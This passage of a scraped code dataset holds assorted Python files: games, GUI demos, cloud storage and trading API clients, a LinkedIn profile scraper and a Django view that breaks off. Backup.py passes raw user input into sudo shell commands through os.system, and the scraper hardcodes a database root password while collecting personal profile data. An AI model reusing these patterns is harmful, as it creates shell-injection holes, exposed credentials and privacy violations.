world.debug.draw_string(spawn_point.location, str(i), life_time=1000)\n\n# In synchronous mode, we need to run the simulation to fly the spectator\nwhile True:\n world.tick()","repo_name":"ushiu1230/Self-Driving-Car-with-SSDLiteMobileNetV3-and-Lidar","sub_path":"Map_Plaining.py","file_name":"Map_Plaining.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24118938853","text":"import level\r\nimport magic_number\r\nimport Account\r\nimport searchuser as sc\r\ndef Menu(Uname,AccBalance):\r\n print(\"Welcome back\\nUsername:\",Uname,\"\\nAccount Balance:\",AccBalance)\r\n print(\"#############################__MENU__##############################\")\r\n print(\"1- NEW GAME\")\r\n print(\"2- Instructions\")\r\n print(\"3- Logout\")\r\n 
choice=int(input(\"Enter your choice here: \"))\r\n while(choice!=1 and choice!=2 and choice!=3):\r\n print(\"invalid choice\")\r\n choice=int(input(\"enter a valid selection: \"))\r\n if(choice == 1):\r\n magic_number.game_party(level.level(), AccBalance, Uname)\r\n elif(choice == 2):\r\n magic_number.game_description(Uname, AccBalance)\r\n else:\r\n if Account.start()==1:\r\n sc.login(Account.Login())\r\n elif Account.start()==2:\r\n sc.registration(Account.Register())\r\n else:\r\n exit(0)","repo_name":"Mikelbernard12/PycharmProjects","sub_path":"magicNumber/Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"605506117","text":"import os\nimport sys\nfrom flask import Flask\nimport os\nfrom azure.storage.blob import BlobServiceClient, __version__\n\n\nroot_folder = os.path.abspath(os.path.dirname(\n os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(root_folder)\napp = Flask(__name__)\napp.config.from_object('config')\nstorage_account_connection_string = app.config[\"STORAGE_ACCOUNT_CONNECTION_STRING\"]\n\nblob_service_client = BlobServiceClient.from_connection_string(storage_account_connection_string)\n\ndef create_container(container_name: str):\n blob_service_client.create_container(container_name)\n\ndef upload_file(container_name: str, local_file_name: str, full_path_file: str):\n blob_client = blob_service_client.get_blob_client(container=container_name, blob=local_file_name)\n\n with open(full_path_file, \"rb\") as data:\n blob_client.upload_blob(data)\n return blob_client.url\n\ndef download_file(container_name: str, local_directory: str, full_path_file: str):\n head, file_name = os.path.split(full_path_file)\n print(\"file_name: \")\n print(file_name)\n file_dir = os.path.join(local_directory, container_name)\n if not os.path.exists(file_dir):\n os.makedirs(file_dir)\n download_file_path = os.path.join(file_dir, file_name)\n print(\"download_file_path: \")\n print(download_file_path)\n blob_client = blob_service_client.get_blob_client(container=container_name, blob=file_name)\n\n with open(download_file_path, \"wb\") as download_file:\n download_file.write(blob_client.download_blob().readall())\n\n return download_file_path","repo_name":"soadcam/azure_bizagi_project","sub_path":"backend/utility/blob_storage.py","file_name":"blob_storage.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1977196303","text":"#coding: UTF-8\nimport fileinput\nfrom gensim.models.doc2vec import Doc2Vec\nimport sys\nimport numpy as np\nfrom nltk.stem.porter import PorterStemmer as PS\nimport re\n\n\nargs = sys.argv\ndecimal_pattern = re.compile(r'[0-9]+')\nps = PS()\n\nmodel = Doc2Vec.load(args[1])\n\n# header\nprint(\"path\", \"name1\", \"name2\", \"range\", \"semantic_similarity\", sep='\\t')\n\ndef convert(words):\n tokens = words.lower()\n tokens = tokens.replace(',', ' ')\n tokens = decimal_pattern.sub(' <num> ', tokens)\n stemmed_tokens = []\n for token in tokens.split():\n if token.isdecimal():\n stemmed_tokens.append('<num>')\n else:\n stemmed_tokens.append(ps.stem(token))\n return stemmed_tokens\n\nis_header = True\nfor line in fileinput.input(files='-'):\n if is_header:\n is_header = False\n continue\n line = line.strip()\n records = line.split('\\t')\n path = records[0]\n name1 = records[1]\n name2 = records[2]\n scope = records[3]\n words1 = 
records[4]\n words2 = records[5]\n if name1 == name2:\n cossim = 1\n else:\n v1 = model.infer_vector(convert(words1))\n v2 = model.infer_vector(convert(words2))\n cossim = np.dot(v1,v2)/(np.linalg.norm(v1)*np.linalg.norm(v2))\n print(path, name1, name2, scope, cossim, sep='\\t')\n","repo_name":"amanhirohisa/cvpfinder","sub_path":"lib/compute_semantic_similarity.py","file_name":"compute_semantic_similarity.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71995365200","text":"import MySQLdb\nfrom juicer.utils import *\nfrom juicer.items import *\nhandle_httpstatus_list = [404, 302, 303]\nclass Linkedin30crawl(JuicerSpider):\n name = 'linkedin_flag_browse'\n\n def __init__(self, *args, **kwargs):\n super(Linkedin30crawl, self).__init__(*args, **kwargs)\n self.con = MySQLdb.connect(db = 'FACEBOOK', \\\n host = 'localhost', charset=\"utf8\", use_unicode=True, \\\n user = 'root', passwd = 'hdrn59!')\n self.cur = self.con.cursor()\n self.field = kwargs.get('field', 'clean_url')\n get_query_param = \"\"\n if self.field == 'url':\n get_query_param = \"select sk, url, meta_data from linkedin_crawl30 where crawl_status=0 limit 500\"\n else: get_query_param = \"select sk, url, meta_data from linkedin_crawl30 where flag = 'True' and crawl_type = '' limit 10000\"\n #get_query_param = \"select sk, url, meta_data from linkedin_crawl30 where sk = '11930ca31e4678bdd4e3710c3b455fc9'\"\n self.cur.execute(get_query_param)\n self.profiles_list = [i for i in self.cur.fetchall()]\n\n def start_requests(self):\n requests = []\n for i in self.profiles_list:\n url = i[1]\n query1 = \"\"\n if self.field == 'url':\n query1 = \"update linkedin_crawl30 set crawl_status=1 where sk ='%s'\"%(i[0])\n else: query1 = \"update linkedin_crawl30 set crawl_type ='crawled' where sk ='%s'\"%(i[0])\n self.cur.execute(query1)\n request = Request(url, self.parse, meta={'sk':i[0], 'meta_data':i[2]}, dont_filter=True)\n requests.extend(request)\n return requests\n\n def parse(self, response):\n sk = response.meta['sk']\n sel = Selector(response)\n if self.field == 'url':\n valid = 'False'\n if response.status== 200 and not 'your request could not be completed' in response.body.lower():\n valid = 'True'\n query = \"update linkedin_crawl30 set flag= '%s' where sk ='%s'\"%(valid,sk)\n self.cur.execute(query)\n else:\n first_name = extract_data(sel,'//div[@class=\"member-info\"]/h1//span[@class=\"given-name\"]/text()')\n last_name = extract_data(sel, '//div[@class=\"member-info\"]/h1//span[@class=\"family-name\"]/text()')\n name = (\"%s%s%s\"%(first_name,' ', last_name)).strip()\n locality = extract_data(sel, '//div[@class=\"member-info\"]/p//span[@class=\"locality\"]/text()')\n image = extract_data(sel, '//div[@class=\"member-photo\"]/img/@src')\n if 'icon_no_photo' in image: image = ''\n mark = extract_data(sel, '//div[@class=\"member-photo\"]/span[@class=\"mark\"]/@class')\n member_url = extract_data(sel, '//div[@class=\"member-info\"]/h1/a[@class=\"url\"]/@href')\n linke_m = Linkedin()\n if first_name:\n linke_m['sk'] = normalize(sk)\n linke_m['name'] = normalize(name)\n linke_m['first_name'] = normalize(first_name)\n linke_m['last_name'] = normalize(last_name)\n linke_m['locality'] = normalize(locality)\n linke_m['image'] = normalize(image)\n linke_m['mark'] = normalize(mark)\n linke_m['member_url'] = normalize(member_url)\n linke_m['url'] = normalize(response.url)\n yield linke_m\n position_nodes = get_nodes(sel, 
'//div[@class=\"member-info\"]/p//span[@class=\"title\"]')\n if position_nodes:\n for posn in position_nodes:\n title = extract_data(posn, './b[not(@*)]/text()')\n organization = extract_data(posn, './/b[@class=\"org\"]/text()')\n if title:\n linke_p = Linkedinpostions()\n linke_p['sk'] = md5(\"%s%s%s\"%(sk, title, organization))\n linke_p['profile_sk'] = normalize(sk)\n linke_p['title'] = normalize(title)\n linke_p['organization'] = normalize(organization)\n yield linke_p\n viewer_nodes = get_nodes(sel, '//ul[@class=\"has-names\"]/li[@class=\"vcard\"]')\n if viewer_nodes:\n for node in viewer_nodes:\n ndoe_url = extract_data(node,'./span[a]/a/@href')\n node_txt = extract_data(node, './span[a]/a/text()')\n node_headline = extract_data(node,'./span[@class=\"headline\"]//text()').strip().strip(',').strip()\n if node_txt:\n linke_v = Linkedinviewers()\n linke_v['sk'] = md5(\"%s%s%s\"%(sk, ndoe_url, node_headline))\n linke_v['profile_sk'] = normalize(sk)\n linke_v['viewer_url'] = normalize(ndoe_url)\n linke_v['viewer_name'] = normalize(node_txt)\n linke_v['viewer_headline'] = normalize(node_headline)\n yield linke_v\n\n\n\n","repo_name":"headrun/pi","sub_path":"PIFramework/juicer/spiders/linkedin_flag_browse.py","file_name":"linkedin_flag_browse.py","file_ext":"py","file_size_in_byte":5795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7110041862","text":"import tkinter as tk\nimport time\n\nwindow = tk.Tk()\nwindow.title(\"a\")\nwindow.geometry('800x500')\n\ncanvas = tk.Canvas(window, width=500, height=300, bg='grey')\ncanvas.place(x=0, y=0)\n\ncanvas.create_rectangle(5,5,105,25,outline='blue',width=1)\n\ndef add_some(prec):\n canvas.create_rectangle(5,5,1.05*int(prec),25,width=0,fill='red')\n\ndef move_r():\n global e\n e=en_b.get()\n\nen_b=tk.Entry(window)\nen_b.place(y=300,x=0)\n\ne=tk.StringVar()\n\n\n\nbtn=tk.Button(window,width=20,command=lambda:add_some(e),text=\"add_some\")\nbtn.place(x=0,y=350)\n\nbtn_1=tk.Button(window,width=20,command=move_r,text=\"get\")\nbtn_1.place(x=0,y=380)\n\n\nwindow.mainloop()\n","repo_name":"Erica-Iris/Python","sub_path":"WNACG_Downer/UI_test.py","file_name":"UI_test.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9210350749","text":"from datetime import datetime\nfrom time import sleep\nimport traceback\nfrom binance.spot import Spot\nfrom binance.error import ClientError as BinanceError\nimport config \nimport cloud_logger\n\nDEPTH_LIMIT = 5000\nREQUEST_ID_SUFFIXE = '@snapshot_depth@5000'\nSECONDS_BETWEEN_PAIR = 15\n\n\nclass BookSnapshot:\n client = None\n msg_callback = None\n\n\n def __init__(self,callback):\n self.client = Spot()\n self.msg_callback = callback\n\n\n def get_all_depths(self):\n for pair in config.pairs:\n try:\n depth = self.__get_enriched_depth__(pair)\n self.msg_callback(depth)\n except BinanceError as err:\n self.handle_binance_error(err)\n continue\n except Exception:\n log_body = {'message': traceback.format_exc()}\n cloud_logger.write_log(log_body, severity='ERROR')\n\n sleep(SECONDS_BETWEEN_PAIR)\n\n\n def __get_enriched_depth__(self, pair):\n depth = self.client.depth(pair.upper(), limit=DEPTH_LIMIT)\n depth['localtimestamp'] = datetime.now().timestamp()\n depth['request_name'] = f'{pair.upper()}{REQUEST_ID_SUFFIXE}'\n return depth\n\n\n def handle_binance_error(err: BinanceError):\n log_body = {'message': str(err), 'status_code': err.status_code}\n 
cloud_logger.write_log(log_body, severity='WARNING')\n if(err.status_code != 400): raise err\n\n \n","repo_name":"olivierpicard/brushed-charts","sub_path":"services/binance_rest_fetch/book_snapshot.py","file_name":"book_snapshot.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72395637843","text":"from openpyxl import load_workbook\n\n# get_column_letter function => will give us the column title out of the column index\nfrom openpyxl.utils import get_column_letter\n\n# Getting the excel file\nwb = load_workbook(\"test2.xlsx\")\nsheet=wb.active\n\n\"\"\"\nWith Excel:\n- First row has the index value of 1\n- First column also has the index value of 1\n\"\"\"\n# Looping through worksheet cells (access multiple cells):\n# we have 5 rows: 1 to 6 in python range function\n\n# (other programming languages) x = \"A\" + 1 => A1\n\n# for (i=1; i<6; i++) :-)\nfor row in range(1, 6):\n # row=1, 2, 3, 4, 5\n # each row has two columns:\n \"\"\"\n Notice here we need to get:\n 1) A1, B1\n 2) A2, B2\n 3) A3, B3\n and so on...\n \"\"\"\n for column in range(1,3): # 1 and 2 columns\n # column=1 and column=2 \n # print(sheet['A1'].value, sheet['B1'].value)\n \n # print(sheet[row,column].value)\n # Error: TypeError: expected string or bytes-like object\n\n \"\"\"\n we can use a function from \"openpyxl\"\n called get_column_letter\n this function needs to be imported\n \"\"\"\n letter = get_column_letter(column) # column=1 => A, column=2 => B\n \n # print(sheet[letter+row].value, sheet[letter+row].value)\n # Error: TypeError: can only concatenate str (not \"int\") to str \n print(sheet[letter+str(row)].value)\n\n\n","repo_name":"anmarjarjees/py-code","sub_path":"week14/word-excel/py-excel3.py","file_name":"py-excel3.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"25175215771","text":"from collections import namedtuple\nimport hashlib\nimport hmac\nimport warnings\n\ntry:\n from urllib import urlencode\nexcept ImportError:\n from urllib.parse import urlencode\n\nfrom . import keyhandler\nfrom . 
import public\n\n\nclass InvalidNonceException(Exception):\n def __init__(self, method, expectedNonce, actualNonce):\n Exception.__init__(self)\n self.method = method\n self.expectedNonce = expectedNonce\n self.actualNonce = actualNonce\n\n def __str__(self):\n return \"Expected a nonce greater than %d\" % self.expectedNonce\n\n\nclass InvalidSortOrderException(Exception):\n \"\"\" Exception thrown when an invalid sort order is passed \"\"\"\n pass\n\n\nclass TradeAccountInfo(object):\n \"\"\"An instance of this class will be returned by\n a successful call to TradeAPI.getInfo.\"\"\"\n\n def __init__(self, info):\n self.funds = info.get(u'funds')\n self.open_orders = info.get(u'open_orders')\n self.server_time = info.get(u'server_time')\n self.transaction_count = info.get(u'transaction_count')\n rights = info.get(u'rights')\n self.info_rights = (rights.get(u'info') == 1)\n self.withdraw_rights = (rights.get(u'withdraw') == 1)\n self.trade_rights = (rights.get(u'trade') == 1)\n\n\nTransactionHistoryItem = namedtuple(\"TransactionHistoryItem\",\n [\"transaction_id\", \"type\", \"amount\", \"currency\", \"desc\", \"status\", \"timestamp\"])\n\n\nTradeHistoryItem = namedtuple(\"TradeHistoryItem\",\n [\"transaction_id\", \"pair\", \"type\", \"amount\", \"rate\", \"order_id\", \"is_your_order\", \"timestamp\"])\n\n\nOrderItem = namedtuple(\"OrderItem\",\n [\"order_id\", \"pair\", \"type\", \"amount\", \"rate\", \"timestamp_created\", \"status\"])\n\n\nTradeResult = namedtuple(\"TradeResult\",\n [\"received\", \"remains\", \"order_id\", \"funds\"])\n\n\nCancelOrderResult = namedtuple(\"CancelOrderResult\",\n [\"order_id\", \"funds\"])\n\n\ndef setHistoryParams(params, from_number, count_number, from_id, end_id,\n order, since, end):\n if from_number is not None:\n params[\"from\"] = \"%d\" % from_number\n if count_number is not None:\n params[\"count\"] = \"%d\" % count_number\n if from_id is not None:\n params[\"from_id\"] = \"%d\" % from_id\n if end_id is not None:\n params[\"end_id\"] = \"%d\" % end_id\n if order is not None:\n if order not in (\"ASC\", \"DESC\"):\n raise InvalidSortOrderException(\"Unexpected order parameter: %r\" % order)\n params[\"order\"] = order\n if since is not None:\n params[\"since\"] = \"%d\" % since\n if end is not None:\n params[\"end\"] = \"%d\" % end\n\n\nclass TradeAPI(object):\n def __init__(self, key, handler, connection):\n self.key = key\n self.handler = handler\n self.connection = connection\n self.apiInfo = public.APIInfo(self.connection)\n self.raiseIfInvalidNonce = True\n\n if not isinstance(self.handler, keyhandler.AbstractKeyHandler):\n raise TypeError(\"The handler argument must be a\"\n \" keyhandler.AbstractKeyHandler, such as\"\n \" keyhandler.KeyHandler\")\n\n # We depend on the key handler for the secret\n self.secret = handler.getSecret(key)\n\n def _post(self, params, allowNonceRetry=False):\n params[\"nonce\"] = self.handler.getNextNonce(self.key)\n encoded_params = urlencode(params)\n\n # Hash the params string to produce the Sign header value\n H = hmac.new(self.secret.encode('utf-8'), digestmod=hashlib.sha512)\n H.update(encoded_params.encode('utf-8'))\n sign = H.hexdigest()\n\n headers = {\"Key\": self.key, \"Sign\": sign}\n result = self.connection.makeJSONRequest(\"/tapi\", headers, encoded_params)\n\n success = result.get(u'success')\n if not success:\n err_message = result.get(u'error')\n method = params.get(\"method\", \"[uknown method]\")\n\n if \"invalid nonce\" in err_message:\n # If the nonce is out of sync, make one attempt to 
update to\n # the correct nonce. This sometimes happens if a bot crashes\n # and the nonce file doesn't get saved, so it's reasonable to\n # attempt a correction. If multiple threads/processes are\n # attempting to use the same key, this mechanism will\n # eventually fail and the InvalidNonce will be emitted so that\n # you'll end up here reading this comment. :)\n\n # The assumption is that the invalid nonce message looks like\n # \"invalid nonce parameter; on key:4, you sent:3\"\n s = err_message.split(\",\")\n expected = int(s[-2].split(\":\")[1].strip(\"'\"))\n actual = int(s[-1].split(\":\")[1].strip(\"'\"))\n if self.raiseIfInvalidNonce and not allowNonceRetry:\n raise InvalidNonceException(method, expected, actual)\n\n warnings.warn(\"The nonce in the key file is out of date;\"\n \" attempting to correct.\")\n self.handler.setNextNonce(self.key, expected + 1000)\n return self._post(params, True)\n elif \"no orders\" in err_message and method == \"ActiveOrders\":\n # ActiveOrders returns failure if there are no orders;\n # intercept this and return an empty dict.\n return {}\n elif \"no trades\" in err_message and method == \"TradeHistory\":\n # TradeHistory returns failure if there are no trades;\n # intercept this and return an empty dict.\n return {}\n\n raise Exception(\"%s call failed with error: %s\"\n % (method, err_message))\n\n if u'return' not in result:\n raise Exception(\"Response does not contain a 'return' item.\")\n\n return result.get(u'return')\n\n def getInfo(self):\n params = {\"method\": \"getInfo\"}\n return TradeAccountInfo(self._post(params))\n\n def transHistory(self, from_number=None, count_number=None,\n from_id=None, end_id=None, order=\"DESC\",\n since=None, end=None):\n\n params = {\"method\": \"TransHistory\"}\n\n setHistoryParams(params, from_number, count_number, from_id, end_id,\n order, since, end)\n\n orders = self._post(params)\n result = []\n for k, v in orders.items():\n result.append(TransactionHistoryItem(int(k), **v))\n\n # We have to sort items here because the API returns a dict\n if \"ASC\" == order:\n result.sort(key=lambda a: a.transaction_id, reverse=False)\n elif \"DESC\" == order:\n result.sort(key=lambda a: a.transaction_id, reverse=True)\n\n return result\n\n def tradeHistory(self, from_number=None, count_number=None,\n from_id=None, end_id=None, order=None,\n since=None, end=None, pair=None):\n\n params = {\"method\": \"TradeHistory\"}\n\n setHistoryParams(params, from_number, count_number, from_id, end_id,\n order, since, end)\n\n if pair is not None:\n self.apiInfo.validate_pair(pair)\n params[\"pair\"] = pair\n\n orders = list(self._post(params).items())\n orders.sort(reverse=order != \"ASC\")\n result = []\n for k, v in orders:\n result.append(TradeHistoryItem(int(k), **v))\n\n return result\n\n def activeOrders(self, pair=None):\n\n params = {\"method\": \"ActiveOrders\"}\n\n if pair is not None:\n pair_info = self.apiInfo.validate_pair(pair)\n params[\"pair\"] = pair\n\n orders = self._post(params)\n result = []\n for k, v in orders.items():\n result.append(OrderItem(int(k), **v))\n\n return result\n\n def trade(self, pair, trade_type, rate, amount):\n pair_info = self.apiInfo.get_pair_info(pair)\n pair_info.validate_order(trade_type, rate, amount)\n params = {\"method\": \"Trade\",\n \"pair\": pair,\n \"type\": trade_type,\n \"rate\": pair_info.format_currency(rate),\n \"amount\": pair_info.format_currency(amount)}\n\n return TradeResult(**self._post(params))\n\n def cancelOrder(self, order_id):\n params = {\"method\": 
\"CancelOrder\",\n \"order_id\": order_id}\n return CancelOrderResult(**self._post(params))\n","repo_name":"CodeReclaimers/btce-api","sub_path":"btceapi/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":8452,"program_lang":"python","lang":"en","doc_type":"code","stars":191,"dataset":"github-code","pt":"3"} +{"seq_id":"4375950076","text":"### Importations ###\n\nfrom tkinter import *\nimport os\n\n### Variables ###\n\nfen = Tk()\nfen.title(\"Backup.py\")\ncan = Canvas(fen, height = 200, width = 160)\ntxt1 = Label(can, text = \"Nom :\")\ntxt2 = Label(can, text = \"Chemin : \")\ntxt3 = Label(can, text = \"Nom :\")\ntxt4 = Label(can, text = \"Nom :\")\ntxt5 = Label(can, text = \"Nom :\")\n\nentr1_var = StringVar()\nentr2_var = StringVar()\nentr3_var = StringVar()\nentr4_var = StringVar()\nentr5_var = StringVar()\n\nentr1 = Entry(can, textvariable = entr1_var)\nentr2 = Entry(can, textvariable = entr2_var)\nentr3 = Entry(can, textvariable = entr3_var)\nentr4 = Entry(can, textvariable = entr4_var)\nentr5 = Entry(can, textvariable = entr5_var)\nscrollbar = Scrollbar(can)\n\nliste_bash = Listbox(can, xscrollcommand=scrollbar.set, width = 30)\n\n\n\n### Fonctions\n\ndef extract():\n\tglobal entr4_var\n\tentr4_var = entr4_var.get()\n\tos.system(\"sudo ./backup.sh extract %s\" %(entr4_var))\n\ndef save():\n\tglobal entr1_var, entr2_var\n\tentr1_var = entr1_var.get()\n\tentr2_var = entr2_var.get()\n\tos.system(\"sudo ./backup.sh save %s %s\" %(entr1_var, entr2_var))\n\ndef delete():\n\tglobal entr3_var\n\tentr3_var = entr3_var.get()\n\tos.system(\"sudo ./backup.sh delete %s\" %(entr3_var))\n\t\ndef restore():\n\tglobal entr5_var\n\tentr5_var = entr5_var.get()\n\tos.system(\"sudo ./backup.sh restore %s\" %(entr5_var))\n\ndef deleteAll():\n\tos.system(\"yes `echo YES` | sudo ./backup.sh delete all\")\n\ndef listappend():\n\tos.system(\"sudo ./backup.sh list>file.txt\")\n\t\n\n### Buttons ###\n\nboutton_Save = Button(can, text = \"Save\", command = save)\nboutton_Delete = Button(can, text = \"Delete\", command = delete)\nboutton_Delete_all = Button(can, text = \"Delete All Backups\", command = deleteAll)\nboutton_Extract = Button(can, text = \"Extract\", command = extract)\nboutton_Restore = Button(can, text = \"Restore\", command = restore)\n\n### Positions ###\nlistappend()\nfichier = open('file.txt','r')\n\nfor lignes in fichier:\n\tliste_bash.insert(1, lignes)\n\n\ntxt1.grid(row = 1, column = 1)\nentr1.grid(row = 1, column = 2)\n\ntxt2.grid(row = 1, column = 3)\nentr2.grid(row = 1 , column = 4)\nboutton_Save.grid(row = 1, column = 5)\n\ntxt3.grid(row = 2, column = 3)\nentr3.grid(row = 2, column = 4)\nboutton_Delete.grid(row = 2, column = 5)\n\ntxt4.grid(row = 3, column = 3)\nentr4.grid(row=3,column=4)\nboutton_Extract.grid(row = 3, column = 5)\n\ntxt5.grid(row = 4, column = 3)\nentr5.grid(row=4, column = 4)\nboutton_Restore.grid(row=4, column=5)\n\nboutton_Delete_all.grid(row = 5, column = 2)\nliste_bash.grid(row = 5, column=3)\nscrollbar.grid(column = 3, row=6)\nscrollbar.config(orient=HORIZONTAL, command=liste_bash.xview)\n\ncan.grid(row = 10, column = 5, rowspan = 3, padx=10, pady=10)\nfen.mainloop()\n","repo_name":"antoineDurand82/Projet_Infra_B1A","sub_path":"Backup.py","file_name":"Backup.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27091733175","text":"import pygame\nfrom scripts.ingame import assets, global_, setting, tank\nfrom assets import Assets\nfrom global_ 
import Global\nfrom setting import Setting\nfrom tank import Heavy_Tank, Light_Tank, SPG, Tank_Destroyer\n\ndef init():\n\tpygame.init()\n\tGlobal.init()\n\tSetting.init()\n\nif __name__ == '__main__':\n\tinit()\n\n\tscreen = pygame.display.set_mode(Setting.Window.SCREEN_SIZE)\n\n\ttank = Light_Tank('Tank 1', pygame.Color('BLUE'), (100, 100))\n\ttank2 = Heavy_Tank('Tank 2', pygame.Color('RED'), (200, 100))\n\tGlobal.add_wall(Assets.Map.MAP1)\n\tGlobal.add_boundary()\n\tGlobal.game_quit = False\n\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tGlobal.game_quit = True\n\t\t\t\tbreak\n\t\tif Global.game_quit:\n\t\t\tbreak\n\t\tscreen.fill(Setting.Environment.BACKGROUND_COLOR)\n\t\tpressed = pygame.key.get_pressed()\n\t\ttank.check_actions(pressed)\n\t\tGlobal.update()\n\t\tGlobal.draw(screen)\n\t\tpygame.display.flip()\n\t\tpygame.time.wait(Setting.Window.MSPF)\n\tpygame.display.quit()\n","repo_name":"alm818/battle_tank_multiplayer","sub_path":"test_pygame.py","file_name":"test_pygame.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43811600243","text":"T = int(input())\n\nfor t in range(1, T+1) :\n XY = int(input())\n list1 = [[0] * XY for i in range(XY)]\n x, y = 0, -1\n dx, dy = 0, 1\n\n number = 1\n\n for i in range(XY * XY) :\n if not (0<= x + dx < XY and 0 <= y + dy < XY and list1[x + dx][y + dy] == 0) : # 범위 안에 없거나, 이미 값이 변화했으면\n if abs(dy) == 1 :\n dx, dy = dy, dx\n else : # abs(dx) == 1\n dx, dy = dy, -dx\n x += dx # 위치 이동\n y += dy # 위치 이동\n list1[x][y] = number\n\n number += 1\n print('#', t, sep='')\n for x in range(XY) :\n print(*list1[x])\n","repo_name":"KDT2-Algorithm-study/Algorithm-study","sub_path":"SWEA/1954/1954_정윤원.py","file_name":"1954_정윤원.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"ko","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"37861642966","text":"from PyQt4 import QtCore, QtGui\r\n\r\n\r\nclass Item:\r\n def __init__(self, name, surname, birth, mail, phone):\r\n self.name = name\r\n self.surname = surname\r\n self.birth = birth\r\n self.mail = mail\r\n self.phone = phone\r\n\r\n def __str__(self):\r\n return \"------------Item------------\" \\\r\n \"\\nName - \"+self.name + \\\r\n \"\\nSurname - \"+self.surname + \\\r\n \"\\nBirth - \"+self.birth + \\\r\n \"\\nMail - \"+self.mail + \\\r\n \"\\nPhone - \"+self.phone + \"\\n\" \\\r\n \"------------End-------------\"\r\n\r\n def getList(self):\r\n return [self.name, self.surname, self.birth, self.mail, self.phone]\r\n\r\n def __len__(self):\r\n return 5\r\n\r\n\r\nclass TableModel(QtCore.QAbstractTableModel):\r\n def __init__(self, items=[], headers=[], parent=None):\r\n QtCore.QAbstractTableModel.__init__(self, parent)\r\n self._items = items\r\n self._headers = headers\r\n\r\n def rowCount(self, parent=None, *args, **kwargs):\r\n return len(self._items)\r\n\r\n def columnCount(self, parent=None, *args, **kwargs):\r\n return 5\r\n\r\n def flags(self, index):\r\n return QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled\r\n\r\n def data(self, index, role):\r\n row = index.row()\r\n column = index.column()\r\n if role == QtCore.Qt.EditRole:\r\n return self._items[row][column]\r\n\r\n if role == QtCore.Qt.ToolTipRole:\r\n return self._items[row][column]\r\n\r\n if role == QtCore.Qt.DisplayRole:\r\n value = self._items[row][column]\r\n return value\r\n\r\n def setData(self, index, 
value, role=QtCore.Qt.EditRole):\r\n if role == QtCore.Qt.EditRole:\r\n row = index.row()\r\n column = index.column()\r\n self._items[row][column] = value\r\n self.dataChanged.emit(index, index)\r\n return True\r\n\r\n def headerData(self, section, orientation, role):\r\n if role == QtCore.Qt.DisplayRole:\r\n if orientation == QtCore.Qt.Horizontal:\r\n return self._headers[section]\r\n else:\r\n return section + 1\r\n\r\n def insertRows(self, position, rows, parent=QtCore.QModelIndex()):\r\n self.beginInsertRows(QtCore.QModelIndex(), position, position + rows - 1)\r\n for i in range(rows):\r\n self._items.insert(position, Item(\"Ihor\", \"Paliy\", \"1997-06-06\", \"darkfree97@gmail.com\", \"+380977456929\").getList())\r\n self.endInsertRows()\r\n return True\r\n\r\n def removeRows(self, position, rows=-1, parent=QtCore.QModelIndex()):\r\n if rows == -1:\r\n rows = len(self._items)\r\n self.beginRemoveRows(QtCore.QModelIndex(), position, position + rows - 1)\r\n for i in range(rows):\r\n value = self._items[position]\r\n self._items.remove(value)\r\n self.endRemoveRows()\r\n return True\r\n\r\n def insertRow(self, item=[], parent=None, *args, **kwargs):\r\n self.beginInsertRows(QtCore.QModelIndex(), 0, 0)\r\n self._items.insert(self.rowCount(), item)\r\n self.endInsertRows()\r\n return True\r\n","repo_name":"darkfree97/python-education-rep","sub_path":"AVDLab3/Item.py","file_name":"Item.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7048551155","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.db.models import Min\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import redirect\nimport datetime as dt\nimport calendar as c\nimport json\n\nfrom zerf.models import Entry, Group\n\n@csrf_exempt\ndef redirect_view(request):\n curr_date = dt.datetime.now().strftime('%d.%m.%Y')\n response = redirect(curr_date)\n return response\n\n@csrf_exempt\ndef index(request, in_date):\n \n sel_date = dt.datetime.strptime(in_date, \"%d.%m.%Y\")\n curr_date = dt.datetime.now()\n d = []\n for i in range(c.monthrange(sel_date.year, sel_date.month)[1]):\n d.append(dt.date(sel_date.year, sel_date.month, i+1))\n \n entries = Entry.objects.all()\n start_time = []\n end_time = []\n date_entries = []\n time_diff = []\n for e in entries:\n start_time.append(e.start_time)\n end_time.append(e.end_time)\n time_diff.append(dt.datetime.combine(dt.date.today(), e.end_time) - \n dt.datetime.combine(dt.date.today(), e.start_time) )\n date_entries.append(e.date)\n\n time_agg = []\n time_agg_int = []\n day_num = []\n month_num = d[0].month\n month_name = tuple(['January', 'February', 'March', 'April', 'Mai', 'June', 'Juli', 'August', 'September', 'October', 'November', 'December'])[month_num-1]\n month_str = str(month_num + 100)[-2:]\n year_num = d[0].year\n for date in d:\n 